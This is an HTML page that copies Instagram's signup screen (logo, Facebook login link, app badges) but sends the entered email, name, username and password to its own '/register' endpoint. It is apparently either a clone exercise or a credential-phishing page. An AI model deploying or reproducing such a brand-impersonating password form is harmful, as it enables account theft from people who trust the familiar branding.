<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="/stylesheets/style.css">
    <title>Document</title>
</head>

<body>
    <div id="main2">
        <div class="ovrlay">
            <div class="container">
                <div class="content">
                    <i style="background-image: url(&quot;https://static.cdninstagram.com/rsrc.php/v3/yS/r/ajlEU-wEDyo.png&quot;); background-position: 0px -52px; background-size: auto; width: 175px; height: 51px; background-repeat: no-repeat; display: inline-block;"
                        role="img" class="" aria-label="Instagram" data-visualcompletion="css-img"></i>
                    <h2 class="vvzhL">Sign up to see photos and videos from your friends.</h2>
                    <a
                        href="https://www.facebook.com/login.php?skip_api_login=1&amp;api_key=124024574287414&amp;kid_directed_site=0&amp;app_id=124024574287414&amp;signed_next=1&amp;next=https%3A%2F%2Fwww.facebook.com%2Fdialog%2Foauth%3Fclient_id%3D124024574287414%26redirect_uri%3Dhttps%253A%252F%252Fwww.instagram.com%252Faccounts%252Fsignup%252F%26state%3D%257B%2522fbLoginKey%2522%253A%25221mrh52n1kfsl0i431ywulijsdx1wvir7h12jz6qo7cqiukyv5uaf%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252Ffxcal%252Fdisclosure%252F%2522%257D%26scope%3Demail%26response_type%3Dcode%252Cgranted_scopes%26locale%3Den_US%26ret%3Dlogin%26fbapp_pres%3D0%26logger_id%3D367032a2-76c4-4f33-bc0b-cf57ad75f649%26tp%3Dunspecified&amp;cancel_url=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F%3Ferror%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied%26state%3D%257B%2522fbLoginKey%2522%253A%25221mrh52n1kfsl0i431ywulijsdx1wvir7h12jz6qo7cqiukyv5uaf%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252Ffxcal%252Fdisclosure%252F%2522%257D%23_%3D_&amp;display=page&amp;locale=en_GB&amp;pl_dbl=0"><button
                            class="fb-login-btn" type="button">
                            <div class="signupfblogo"><img height="15px"
                                    src="https://imgs.search.brave.com/AX34wiiWNWK_TUaPjJj-qm13dz5_VtTsAm8yxC8VIYU/rs:fit:474:225:1/g:ce/aHR0cHM6Ly90c2Uy/Lm1tLmJpbmcubmV0/L3RoP2lkPU9JUC5S/amtKWXlnSFFXc0hP/a01TeUlqdm13SGFI/YSZwaWQ9QXBp"
                                    alt="">Log in with Facebook</div>
                        </button></a>
                    <div class="content__or-text">
                        <span></span>
                        <span>OR</span>
                        <span></span>
                    </div>
                    <form action="/register" method="post" class="content__form">
                        <div class="content__inputs">
                            <label>
                                <input required="" name="email" type="text">
                                <span>Mobile number or email</span>
                            </label>
                            <label>
                                <input required="" name="fullname" type="text">
                                <span>Full Name</span>
                            </label>
                            <label>
                                <input required="" name="username" type="text">
                                <span>username</span>
                            </label>
                            <label>
                                <input required="" name="password" type="password">
                                <span>Password</span>
                            </label>
                        </div>
                        <p class="ZGwn1">By signing up, you agree to our <a
                            href="https://help.instagram.com/581066165581870" tabindex="0"
                            waprocessedanchor="true">Terms</a> , <a href="https://help.instagram.com/519522125107875"
                            tabindex="0" waprocessedanchor="true">Data Policy</a> and <a href="/legal/cookies/"
                            tabindex="0">Cookies Policy</a> .</p>
                        <button type="submit">Sign up</button>
                    </form>

                   
                </div>
            </div>
            <div class="box">
                <p> Have an account?<a class="signup" href="/">Log in</a></p>
            </div>
            <p class="txt">Get the app.</p>
            <div class="store">
                <a href="https://apps.apple.com/app/instagram/id389801252?vt=lo"><img
                        src="https://www.instagram.com/static/images/appstore-install-badges/badge_ios_english-en.png/180ae7a0bcf7.png"
                        alt=""></a>
                <a
                    href="https://play.google.com/store/apps/details?id=com.instagram.android&amp;referrer=utm_source%3Dinstagramweb%26utm_campaign%3DloginPage%26ig_mid%3D12E4DDBB-20BD-442C-989A-4B95C5384934%26utm_content%3Dlo%26utm_medium%3Dbadge"><img
                        src="https://www.instagram.com/static/images/appstore-install-badges/badge_android_english-en.png/e9cd846dc748.png"
                        alt=""></a>
            </div>
        </div>
    </div>
</body>

</html>